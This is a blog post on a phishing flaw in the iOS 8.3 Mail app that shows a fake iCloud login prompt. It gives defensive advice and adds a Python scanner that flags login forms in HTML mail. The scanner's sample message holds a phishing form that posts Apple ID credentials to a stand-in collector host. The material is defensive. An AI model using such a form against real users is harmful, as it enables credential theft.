Apple’s iOS platform is one of the most secure mobile operating systems in the world, and each release brings new security features and enhancements. That does not mean iOS is never susceptible to vulnerabilities and security gaps. Currently, in iOS 8.3, there is an iPhone security flaw in the Mail app: it does not filter out malicious HTML code, which could allow an attacker to trick you into providing your iCloud username and password quite easily. Basically, it is an iOS-focused phishing flaw.
As of right now there are no known attacks or emails exploiting this, but that does not mean you should ignore it. This exploit is a pure social engineering attack and can be thwarted by a few settings on your phone, but ultimately user awareness is your best weapon. How the flaw works: an email loaded in the iOS Mail app can contain HTML code that opens a pop-up window looking very similar to the native iCloud login window. Since users are used to seeing that window for downloading apps and other phone functions, the risk is that they will blindly enter their username and password from pure habit. In reality, your credentials will be sent to the hacker, who can use them to take over your account, get your credit card, access your photos, etc.
Here’s what the flaw looks like –
Here’s how you can protect yourself until Apple releases an update.
- First, to be 100% protected from this, enable two-step authentication on your phone. There are a number of resources on how to do this, and it’s very simple to go through the steps. Two-step authentication will change the way your login works, and if you see anything different from that you will know it’s fake.
- Remember that your iCloud login will NEVER open from an email message, and Apple will NEVER, EVER ask you for credentials in an email. No company will. This is the main rule for spotting a phishing email. If you are hesitant, NEVER launch it from the message. Close your mail, open a browser and go to the website yourself, NEVER from a provided link.
- If you are concerned, hit the Home button on your phone. If the login box is fake it will disappear; a real iOS login will stay open when you hit Home.
- Take a step back and ask yourself: why am I being asked for my credentials, and what am I doing that would require it? You will be asked for credentials for app installs and for deep setting changes from the Settings section (not Mail), and for most users that’s about it. Outside of that, be wary.
- Ask someone who knows first: why did I get this? In security, if you don’t know, stop and ask. A few extra minutes to be sure is far better than a year or more of dealing with identity theft and fraud.
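The checks above catch the fake prompt once it is on screen. The same flaw can also be flagged on the mail side, since a legitimate message never needs to carry a login form. The following is an added example, not code from the original post: a small Python scanner that walks the HTML parts of a message and reports credential-prompt elements (password fields, forms and their submit targets, inline scripts). The sample message, the collector host name and all function and class names are my own constructions.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample message (not a real phishing sample): a single HTML part
# that carries a login form styled as an iCloud prompt.
SAMPLE_EML = """\
From: sender@example.com
To: user@example.com
Subject: Please verify your account
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your iCloud session has expired. Sign in to continue.</p>
<form action="http://collector.example.invalid/login" method="post">
  Apple ID <input type="text" name="user">
  Password <input type="password" name="pass">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""

class CredentialPromptDetector(HTMLParser):
    """Collects HTML elements that indicate a login prompt embedded in mail."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.findings.append("password input field")
        elif tag == "form":
            self.findings.append(f"form posting to {a.get('action') or '(none)'}")
        elif tag == "script":
            self.findings.append("inline script")

def scan_message(raw):
    """Return a list of suspicious findings across all text/html parts of raw."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            det = CredentialPromptDetector()
            det.feed(part.get_content())
            findings.extend(det.findings)
    return findings

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print("FLAG:", finding)
```

A mail gateway would quarantine or tag a message with any finding; plain-text mail and HTML without forms or password fields produce an empty list.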
The digital world is a scary dangerous place full of people trying to steal your information and data for profit. Be aware and stay educated.
End of line.
Binary Blogger has spent 20 years in the Information Security space, currently providing security solutions and evangelism to clients. From early web application programming, system administration and senior management to enterprise consulting, I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day.